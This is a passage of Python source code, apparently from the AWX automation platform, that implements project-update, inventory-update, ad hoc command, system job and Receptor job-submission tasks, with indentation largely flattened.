extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
        return 'project_update.yml'
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
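        """Run inventory updates, inline and one at a time, for SCM inventory sources configured to
        update on project update."""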
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
    def acquire_lock(self, instance, blocking=True):
        """Open the project's lock file and block until an exclusive lock is acquired.

        Note: blocking=False is not supported; the call retries until it gets the
        lock or the project update is canceled.
        """
lock_path = instance.get_lock_file()
if lock_path is None:
            # If a migration or anything else blanked local_path, saving the instance regenerates it
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
        # The project update playbook is not in a git repo; it lives in a vendored
        # playbooks directory. To stay consistent with the ansible-runner model,
        # it is copied into the runner project folder here.
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
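        """Remove every cached content directory under cache_dir except keep_value and the staging
        directory, renaming each entry before deletion so partial removals are not mistaken for
        valid caches."""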
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
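        """Record the new revision, promote staged Galaxy content into the durable cache, copy
        content for a waiting job if one is attached, restore the original branch, release the
        lock, and finally kick off any dependent SCM inventory updates."""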
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
            # Copy the roles and collections folders into the durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
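    """Run an inventory update by invoking ansible-inventory and importing the resulting JSON
    output into the database."""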
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
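        # Inventory update verbosity 1 maps to -vvv and 2 or higher maps to -vvvvv for ansible-inventory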
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
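        # Route log output from the inventory_import management command through a handler that
        # emits job events, reusing the command's existing formatter so timestamps stay consistent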
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
            raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
        # TODO: this is able to run by turning off isolation;
        # the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
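    """For each copied object, re-point FIELDS_TO_PRESERVE_AT_COPY relations at the new copies of
    related objects where a copy exists; many-to-many relations are re-added the same way."""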
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
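    """Submit a unit of work to Receptor (locally or to a container group pod) and stream the
    ansible-runner results back for processing."""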
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
